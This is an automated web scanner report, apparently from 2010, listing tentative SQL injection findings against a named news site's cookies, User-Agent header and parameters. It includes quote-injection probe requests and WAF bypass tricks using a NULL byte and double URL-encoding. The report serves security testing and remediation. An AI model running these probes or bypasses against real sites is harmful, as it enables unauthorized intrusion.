<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Veteran shortstop who once energized Oakland As will return to Bay Area in fading ligh ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16745927?nclick_check=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D''; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/giants/ci_16745927?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 07:17:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 07:17:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 441
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /giants/ci_16755841 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16755841 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/giants/ci_16755841?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 07:22:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 07:22:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 441
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The fcspersistslider1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fcspersistslider1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fcspersistslider1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /giants/ci_16755841?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1%2527; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16755841?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1%2527%2527; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]...
1.225. http://www.mercurynews.com/giants/ci_16755841 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/giants/ci_16755841
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16755841?source=rss&1'=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16755841?source=rss&1''=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /giants/ci_16755841?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16755841?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%2527%2527; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The Giants are bringing back one more misfit from their World Series championship team.Outf ...[SNIP]...
The s_cc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_cc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16765848?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true'; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Veteran shortstop is excited about chance to win ring'><meta name="keywords" content="san f ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16765848?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true''; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/giants/ci_16765848?s ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16785859?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='GM will look around at meetings to see if he can tweak his bench'><meta name="keywords" con ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16785859?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='GM will look around at meetings to see if he can tweak his bench'><meta name="keywords" con ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /giants/ci_16793528 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Giants payroll likely to reach $120 million for the 2010 season'><meta name="keywords" ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16793528 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/giants/ci_16793528?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 07:22:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 07:22:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 441
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16793528 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310'; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Giants payroll likely to reach $120 million for the 2010 season'><meta name="keywords" ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16793528 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310''; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/giants/ci_16793528?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:06 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 441
